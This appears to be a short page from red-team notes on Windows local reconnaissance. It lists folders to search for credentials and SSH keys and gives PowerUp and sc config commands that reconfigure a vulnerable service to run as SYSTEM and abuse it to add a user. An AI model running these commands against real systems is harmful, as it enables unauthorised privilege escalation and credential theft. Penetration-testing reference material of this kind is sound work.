Local Reconnaissance Windows

Local Enumeration

  • whoami /priv

  • Files and Directories

C:\program files\

C:\program files (x86)\

C:\users\bob\document

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program Files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (If web app uses MSSQL)

  • Local Session

Available tokens of other users/services

  • Vulnerable Service

ipmo .\powerup.ps1

invoke-allchecks

sc qc vuln

sc config vuln start demand  //Change start type

sc config vuln obj "NT AUTHORITY\SYSTEM"  //Change owner

Invoke-serviceabuse -name 'vuln' -username 'red\alice'  //Abuse
PreviousPhishingNextSQL Server Instance

Last updated